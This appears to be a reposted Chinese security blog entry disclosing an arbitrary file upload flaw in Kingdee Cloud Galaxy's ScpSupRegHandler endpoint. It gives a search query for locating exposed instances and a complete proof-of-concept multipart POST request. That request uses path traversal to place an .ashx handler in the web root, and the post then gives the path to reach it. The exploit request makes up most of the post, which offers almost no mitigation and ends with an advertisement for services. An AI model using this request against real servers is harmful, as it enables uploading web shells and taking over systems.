金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞-POC
2023-11-17 11:9:3 Author: 网络安全交流圈(查看原文) 阅读量:77 收藏

漏洞描述:
金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取服务器权限
漏洞影响:

网络测绘:

app="金蝶云星空-管理中心"

漏洞复现:
登陆页面

poc:
(来源互联网)
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: Accept-Encoding: identityContent-Length: 973Accept-Language: zh-CN,zh;q=0.8Accept: */*Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="dbId_v"
.--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FID"
2022--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."Content-Type: text/plain
<%@ WebHandler Language="C#" Class="TestHandler" %> using System; using System.Web; public class TestHandler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType= "text/plain"; context.Response.Write("Test"); } public bool IsReusable { get {return false; } } }--2ac719f8e29343df94aa4ab49e456061--

访问路径:/K3Cloud/uploadfiles/Test.ashx

欢迎添加微信进行业务咨询:

承接以下业务:


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247485119&idx=1&sn=c095a9dffdfc8804d854efc0d730ddee&chksm=e9fb4198de8cc88e4e71ab760b9f0b5d3578564e8530ca602d35c223d0427577f4dc15421bfb&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh